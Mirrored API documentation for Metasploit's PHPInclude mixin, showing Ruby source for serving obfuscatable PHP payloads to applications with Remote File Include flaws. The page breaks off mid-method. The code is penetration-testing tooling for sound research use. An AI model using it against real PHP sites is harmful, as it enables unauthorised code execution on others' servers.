adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/HttpServer/PHPInclude.html
T

682 lines
40 KiB
HTML
Raw Normal View History

Reboot gh-pages
2026-05-08 17:08:43 +00:00
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::HttpServer::PHPInclude
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::HttpServer::PHPInclude";
relpath = '../../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../_index.html">Index (P)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../HttpServer.html" title="Msf::Exploit::Remote::HttpServer (module)">HttpServer</a></span></span>
&raquo;
<span class="title">PHPInclude</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::HttpServer::PHPInclude
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="../HttpServer.html" title="Msf::Exploit::Remote::HttpServer (module)">Msf::Exploit::Remote::HttpServer</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/http_server/php_include.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>This module provides methods for exploiting PHP scripts by acting as an HTTP server hosting the payload for Remote File Include vulnerabilities.</p>
</div>
</div>
<div class="tags">
</div>
<h2>Instance Attribute Summary</h2>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="../SocketServer.html" title="Msf::Exploit::Remote::SocketServer (module)">SocketServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../SocketServer.html#service-instance_method" title="Msf::Exploit::Remote::SocketServer#service (method)">#service</a></span></p>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#autofilter-instance_method" title="#autofilter (instance method)">#<strong>autofilter</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Since these types of vulns are Stance::Aggressive, override HttpServers normal non-automatic behaviour and allow things to run us automatically.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#exploit-instance_method" title="#exploit (instance method)">#<strong>exploit</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>:category: Exploit::Remote::TcpServer overrides.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(info = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#on_request_uri-instance_method" title="#on_request_uri (instance method)">#<strong>on_request_uri</strong>(cli, request, headers = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>:category: Event Handlers.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#php_include_url-instance_method" title="#php_include_url (instance method)">#<strong>php_include_url</strong>(sock = nil) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>The PHP include URL (pre-encoded).</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#send_php_payload-instance_method" title="#send_php_payload (instance method)">#<strong>send_php_payload</strong>(cli, body, headers = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Transmits a PHP payload to the web application.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../HttpServer.html" title="Msf::Exploit::Remote::HttpServer (module)">Msf::Exploit::Remote::HttpServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../HttpServer.html#add_resource-instance_method" title="Msf::Exploit::Remote::HttpServer#add_resource (method)">#add_resource</a></span>, <span class='object_link'><a href="../HttpServer.html#add_robots_resource-instance_method" title="Msf::Exploit::Remote::HttpServer#add_robots_resource (method)">#add_robots_resource</a></span>, <span class='object_link'><a href="../HttpServer.html#check_dependencies-instance_method" title="Msf::Exploit::Remote::HttpServer#check_dependencies (method)">#check_dependencies</a></span>, <span class='object_link'><a href="../HttpServer.html#cleanup-instance_method" title="Msf::Exploit::Remote::HttpServer#cleanup (method)">#cleanup</a></span>, <span class='object_link'><a href="../HttpServer.html#cli-instance_method" title="Msf::Exploit::Remote::HttpServer#cli (method)">#cli</a></span>, <span class='object_link'><a href="../HttpServer.html#cli=-instance_method" title="Msf::Exploit::Remote::HttpServer#cli= (method)">#cli=</a></span>, <span class='object_link'><a href="../HttpServer.html#close_client-instance_method" title="Msf::Exploit::Remote::HttpServer#close_client (method)">#close_client</a></span>, <span class='object_link'><a href="../HttpServer.html#create_response-instance_method" title="Msf::Exploit::Remote::HttpServer#create_response (method)">#create_response</a></span>, <span class='object_link'><a href="../HttpServer.html#fingerprint_user_agent-instance_method" title="Msf::Exploit::Remote::HttpServer#fingerprint_user_agent (method)">#fingerprint_user_agent</a></span>, <span class='object_link'><a href="../HttpServer.html#get_resource-instance_method" title="Msf::Exploit::Remote::HttpServer#get_resource (method)">#get_resource</a></span>, <span class='object_link'><a href="../HttpServer.html#get_uri-instance_method" title="Msf::Exploit::Remote::HttpServer#get_uri (method)">#get_uri</a></span>, <span class='object_link'><a href="../HttpServer.html#hardcoded_uripath-instance_method" title="Msf::Exploit::Remote::HttpServer#hardcoded_uripath (method)">#hardcoded_uripath</a></span>, <span class='object_link'><a href="../HttpServer.html#print_prefix-instance_method" title="Msf::Exploit::Remote::HttpServer#print_prefix (method)">#print_prefix</a></span>, <span class='object_link'><a href="../HttpServer.html#random_uri-instance_method" title="Msf::Exploit::Remote::HttpServer#random_uri (method)">#random_uri</a></span>, <span class='object_link'><a href="../HttpServer.html#regenerate_payload-instance_method" title="Msf::Exploit::Remote::HttpServer#regenerate_payload (method)">#regenerate_payload</a></span>, <span class='object_link'><a href="../HttpServer.html#remove_resource-instance_method" title="Msf::Exploit::Remote::HttpServer#remove_resource (method)">#remove_resource</a></span>, <span class='object_link'><a href="../HttpServer.html#report_user_agent-instance_method" title="Msf::Exploit::Remote::HttpServer#report_user_agent (method)">#report_user_agent</a></span>, <span class='object_link'><a href="../HttpServer.html#resource_uri-instance_method" title="Msf::Exploit::Remote::HttpServer#resource_uri (method)">#resource_uri</a></span>, <span class='object_link'><a href="../HttpServer.html#send_local_redirect-instance_method" title="Msf::Exploit::Remote::HttpServer#send_local_redirect (method)">#send_local_redirect</a></span>, <span class='object_link'><a href="../HttpServer.html#send_not_found-instance_method" title="Msf::Exploit::Remote::HttpServer#send_not_found (method)">#send_not_found</a></span>, <span class='object_link'><a href="../HttpServer.html#send_redirect-instance_method" title="Msf::Exploit::Remote::HttpServer#send_redirect (method)">#send_redirect</a></span>, <span class='object_link'><a href="../HttpServer.html#send_response-instance_method" title="Msf::Exploit::Remote::HttpServer#send_response (method)">#send_response</a></span>, <span class='object_link'><a href="../HttpServer.html#send_robots-instance_method" title="Msf::Exploit::Remote::HttpServer#send_robots (method)">#send_robots</a></span>, <span class='ob
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Auxiliary/Report.html" title="Msf::Auxiliary::Report (module)">Auxiliary::Report</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Auxiliary/Report.html#active_db%3F-instance_method" title="Msf::Auxiliary::Report#active_db? (method)">#active_db?</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_cracked_credential-instance_method" title="Msf::Auxiliary::Report#create_cracked_credential (method)">#create_cracked_credential</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_credential-instance_method" title="Msf::Auxiliary::Report#create_credential (method)">#create_credential</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_credential_and_login-instance_method" title="Msf::Auxiliary::Report#create_credential_and_login (method)">#create_credential_and_login</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_credential_login-instance_method" title="Msf::Auxiliary::Report#create_credential_login (method)">#create_credential_login</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#db-instance_method" title="Msf::Auxiliary::Report#db (method)">#db</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#db_warning_given%3F-instance_method" title="Msf::Auxiliary::Report#db_warning_given? (method)">#db_warning_given?</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#get_client-instance_method" title="Msf::Auxiliary::Report#get_client (method)">#get_client</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#get_host-instance_method" title="Msf::Auxiliary::Report#get_host (method)">#get_host</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#inside_workspace_boundary%3F-instance_method" title="Msf::Auxiliary::Report#inside_workspace_boundary? (method)">#inside_workspace_boundary?</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#invalidate_login-instance_method" title="Msf::Auxiliary::Report#invalidate_login (method)">#invalidate_login</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#mytask-instance_method" title="Msf::Auxiliary::Report#mytask (method)">#mytask</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#myworkspace-instance_method" title="Msf::Auxiliary::Report#myworkspace (method)">#myworkspace</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#myworkspace_id-instance_method" title="Msf::Auxiliary::Report#myworkspace_id (method)">#myworkspace_id</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_auth_info-instance_method" title="Msf::Auxiliary::Report#report_auth_info (method)">#report_auth_info</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_client-instance_method" title="Msf::Auxiliary::Report#report_client (method)">#report_client</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_exploit-instance_method" title="Msf::Auxiliary::Report#report_exploit (method)">#report_exploit</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_host-instance_method" title="Msf::Auxiliary::Report#report_host (method)">#report_host</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_loot-instance_method" title="Msf::Auxiliary::Report#report_loot (method)">#report_loot</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_note-instance_method" title="Msf::Auxiliary::Report#report_note (method)">#report_note</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_service-instance_method" title="Msf::Auxiliary::Report#report_service (method)">#report_service</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_vuln-instance_method" title="Msf::Auxiliary::Report#report_vuln (method)">#report_vuln</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#rep
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html" title="Metasploit::Framework::Require (module)">Metasploit::Framework::Require</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally-class_method" title="Metasploit::Framework::Require.optionally (method)">optionally</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_active_record_railtie-class_method" title="Metasploit::Framework::Require.optionally_active_record_railtie (method)">optionally_active_record_railtie</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-class_method" title="Metasploit::Framework::Require.optionally_include_metasploit_credential_creation (method)">optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-instance_method" title="Metasploit::Framework::Require#optionally_include_metasploit_credential_creation (method)">#optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_require_metasploit_db_gem_engines-class_method" title="Metasploit::Framework::Require.optionally_require_metasploit_db_gem_engines (method)">optionally_require_metasploit_db_gem_engines</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../TcpServer.html" title="Msf::Exploit::Remote::TcpServer (module)">TcpServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../TcpServer.html#on_client_close-instance_method" title="Msf::Exploit::Remote::TcpServer#on_client_close (method)">#on_client_close</a></span>, <span class='object_link'><a href="../TcpServer.html#on_client_connect-instance_method" title="Msf::Exploit::Remote::TcpServer#on_client_connect (method)">#on_client_connect</a></span>, <span class='object_link'><a href="../TcpServer.html#ssl-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl (method)">#ssl</a></span>, <span class='object_link'><a href="../TcpServer.html#ssl_cert-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl_cert (method)">#ssl_cert</a></span>, <span class='object_link'><a href="../TcpServer.html#ssl_cipher-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl_cipher (method)">#ssl_cipher</a></span>, <span class='object_link'><a href="../TcpServer.html#ssl_compression-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl_compression (method)">#ssl_compression</a></span>, <span class='object_link'><a href="../TcpServer.html#ssl_version-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl_version (method)">#ssl_version</a></span>, <span class='object_link'><a href="../TcpServer.html#start_service-instance_method" title="Msf::Exploit::Remote::TcpServer#start_service (method)">#start_service</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../SocketServer.html" title="Msf::Exploit::Remote::SocketServer (module)">SocketServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../SocketServer.html#_determine_server_comm-instance_method" title="Msf::Exploit::Remote::SocketServer#_determine_server_comm (method)">#_determine_server_comm</a></span>, <span class='object_link'><a href="../SocketServer.html#bindhost-instance_method" title="Msf::Exploit::Remote::SocketServer#bindhost (method)">#bindhost</a></span>, <span class='object_link'><a href="../SocketServer.html#bindport-instance_method" title="Msf::Exploit::Remote::SocketServer#bindport (method)">#bindport</a></span>, <span class='object_link'><a href="../SocketServer.html#cleanup-instance_method" title="Msf::Exploit::Remote::SocketServer#cleanup (method)">#cleanup</a></span>, <span class='object_link'><a href="../SocketServer.html#cleanup_service-instance_method" title="Msf::Exploit::Remote::SocketServer#cleanup_service (method)">#cleanup_service</a></span>, <span class='object_link'><a href="../SocketServer.html#on_client_data-instance_method" title="Msf::Exploit::Remote::SocketServer#on_client_data (method)">#on_client_data</a></span>, <span class='object_link'><a href="../SocketServer.html#primer-instance_method" title="Msf::Exploit::Remote::SocketServer#primer (method)">#primer</a></span>, <span class='object_link'><a href="../SocketServer.html#regenerate_payload-instance_method" title="Msf::Exploit::Remote::SocketServer#regenerate_payload (method)">#regenerate_payload</a></span>, <span class='object_link'><a href="../SocketServer.html#srvhost-instance_method" title="Msf::Exploit::Remote::SocketServer#srvhost (method)">#srvhost</a></span>, <span class='object_link'><a href="../SocketServer.html#srvhost_addr-instance_method" title="Msf::Exploit::Remote::SocketServer#srvhost_addr (method)">#srvhost_addr</a></span>, <span class='object_link'><a href="../SocketServer.html#srvport-instance_method" title="Msf::Exploit::Remote::SocketServer#srvport (method)">#srvport</a></span>, <span class='object_link'><a href="../SocketServer.html#start_service-instance_method" title="Msf::Exploit::Remote::SocketServer#start_service (method)">#start_service</a></span>, <span class='object_link'><a href="../SocketServer.html#via_string-instance_method" title="Msf::Exploit::Remote::SocketServer#via_string (method)">#via_string</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="autofilter-instance_method">
#<strong>autofilter</strong> &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Since these types of vulns are Stance::Aggressive, override HttpServers normal non-automatic behaviour and allow things to run us automatically</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
28
29
30</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 28</span>
<span class='kw'>def</span> <span class='id identifier rubyid_autofilter'>autofilter</span>
<span class='kw'>true</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="exploit-instance_method">
#<strong>exploit</strong> &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>:category: Exploit::Remote::TcpServer overrides</p>
<p>Override exploit() to handle service start/stop</p>
<p>Disables SSL for the service since we always want to serve our evil PHP files from a non-ssl server. There are two reasons for this:</p>
<ol><li>
<p>https is only supported on PHP versions after 4.3.0 and only if the OpenSSL extension is compiled in, a non-default configuration on most systems</p>
</li><li>
<p>somewhat less importantly, the SSL option would conflict with the option for our client connecting to the vulnerable server</p>
</li></ol>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 45</span>
<span class='kw'>def</span> <span class='id identifier rubyid_exploit'>exploit</span>
<span class='id identifier rubyid_old_ssl'>old_ssl</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>SSL</span><span class='tstring_end'>&quot;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>SSL</span><span class='tstring_end'>&quot;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='kw'>false</span>
<span class='id identifier rubyid_start_service'>start_service</span>
<span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>SSL</span><span class='tstring_end'>&quot;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_old_ssl'>old_ssl</span>
<span class='comment'>#if (datastore[&quot;SRVHOST&quot;] == &quot;0.0.0.0&quot; and Rex::Socket.is_internal?(srvhost_addr))
</span> <span class='comment'># print_error(&quot;Warning: the URL used for the include might be wrong!&quot;)
</span> <span class='comment'># print_error(&quot;If the target system can route to #{srvhost_addr} it&quot;)
</span> <span class='comment'># print_error(&quot;is safe to ignore this warning. If not, try using a&quot;)
</span> <span class='comment'># print_error(&quot;reverse payload instead of bind.&quot;)
</span> <span class='comment'>#end
</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>PHP include server started.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='semicolon'>;</span>
<span class='id identifier rubyid_php_exploit'>php_exploit</span>
<span class='op'>::</span><span class='const'>IO</span><span class='period'>.</span><span class='id identifier rubyid_select'>select</span><span class='lparen'>(</span><span class='kw'>nil</span><span class='comma'>,</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='int'>5</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="initialize-instance_method">
#<strong>initialize</strong>(info = {}) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
14
15
16
17
18
19
20
21
22
23
24</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 14</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='comment'># Override TCPServer&#39;s stance of passive
</span> <span class='kw'>super</span><span class='lparen'>(</span><span class='id identifier rubyid_update_info'>update_info</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Stance</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Stance.html" title="Msf::Exploit::Stance (module)">Stance</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Stance.html#Aggressive-constant" title="Msf::Exploit::Stance::Aggressive (constant)">Aggressive</a></span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_register_evasion_options'>register_evasion_options</span><span class='lparen'>(</span>
<span class='lbracket'>[</span>
<span class='const'><span class='object_link'><a href="../../../OptEnum.html" title="Msf::OptEnum (class)">OptEnum</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../OptEnum.html#initialize-instance_method" title="Msf::OptEnum#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PHP::Encode</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Enable PHP code obfuscation</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>none</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>none</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>base64</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='rbracket'>]</span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../HttpServer.html" title="Msf::Exploit::Remote::HttpServer (module)">HttpServer</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="" title="Msf::Exploit::Remote::HttpServer::PHPInclude (module)">PHPInclude</a></span></span>
<span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="on_request_uri-instance_method">
#<strong>on_request_uri</strong>(cli, request, headers = {}) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>:category: Event Handlers</p>
<p>Handle an incoming PHP code request</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
83
84
85
86
87
88
89</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 83</span>
<span class='kw'>def</span> <span class='id identifier rubyid_on_request_uri'>on_request_uri</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='comma'>,</span> <span class='id identifier rubyid_headers'>headers</span><span class='op'>=</span><span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='comment'># Re-generate the payload
</span> <span class='kw'>return</span> <span class='kw'>if</span> <span class='lparen'>(</span><span class='lparen'>(</span><span class='id identifier rubyid_p'>p</span> <span class='op'>=</span> <span class='id identifier rubyid_regenerate_payload'>regenerate_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='rparen'>)</span><span class='rparen'>)</span> <span class='op'>==</span> <span class='kw'>nil</span><span class='rparen'>)</span>
<span class='comment'># Send it to the application
</span> <span class='id identifier rubyid_send_php_payload'>send_php_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_p'>p</span><span class='period'>.</span><span class='id identifier rubyid_encoded'>encoded</span><span class='comma'>,</span> <span class='id identifier rubyid_headers'>headers</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="php_include_url-instance_method">
#<strong>php_include_url</strong>(sock = nil) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>The PHP include URL (pre-encoded)</p>
<p>Does not take SSL into account. For the reasoning behind this, see <span class='object_link'><a href="#exploit-instance_method" title="Msf::Exploit::Remote::HttpServer::PHPInclude#exploit (method)">#exploit</a></span>.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The URL to be used as the argument in a call to <code>require</code>, <code>require_once</code>, or <code>include</code> or <code>include_once</code> in a vulnerable PHP app.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
100
101
102
103
104
105
106</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 100</span>
<span class='kw'>def</span> <span class='id identifier rubyid_php_include_url'>php_include_url</span><span class='lparen'>(</span><span class='id identifier rubyid_sock'>sock</span><span class='op'>=</span><span class='kw'>nil</span><span class='rparen'>)</span>
<span class='id identifier rubyid_host'>host</span> <span class='op'>=</span> <span class='id identifier rubyid_srvhost_addr'>srvhost_addr</span>
<span class='kw'>if</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Socket</span><span class='period'>.</span><span class='id identifier rubyid_is_ipv6?'>is_ipv6?</span><span class='lparen'>(</span><span class='id identifier rubyid_host'>host</span><span class='rparen'>)</span>
<span class='id identifier rubyid_host'>host</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>[</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_host'>host</span><span class='embexpr_end'>}</span><span class='tstring_content'>]</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>http://</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_host'>host</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SRVPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_get_resource'>get_resource</span><span class='lparen'>(</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>?</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="send_php_payload-instance_method">
#<strong>send_php_payload</strong>(cli, body, headers = {}) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Transmits a PHP payload to the web application</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
66
67
68
69
70
71
72
73
74
75
76</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 66</span>
<span class='kw'>def</span> <span class='id identifier rubyid_send_php_payload'>send_php_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_body'>body</span><span class='comma'>,</span> <span class='id identifier rubyid_headers'>headers</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>case</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PHP::Encode</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>base64</span><span class='tstring_end'>&#39;</span></span>
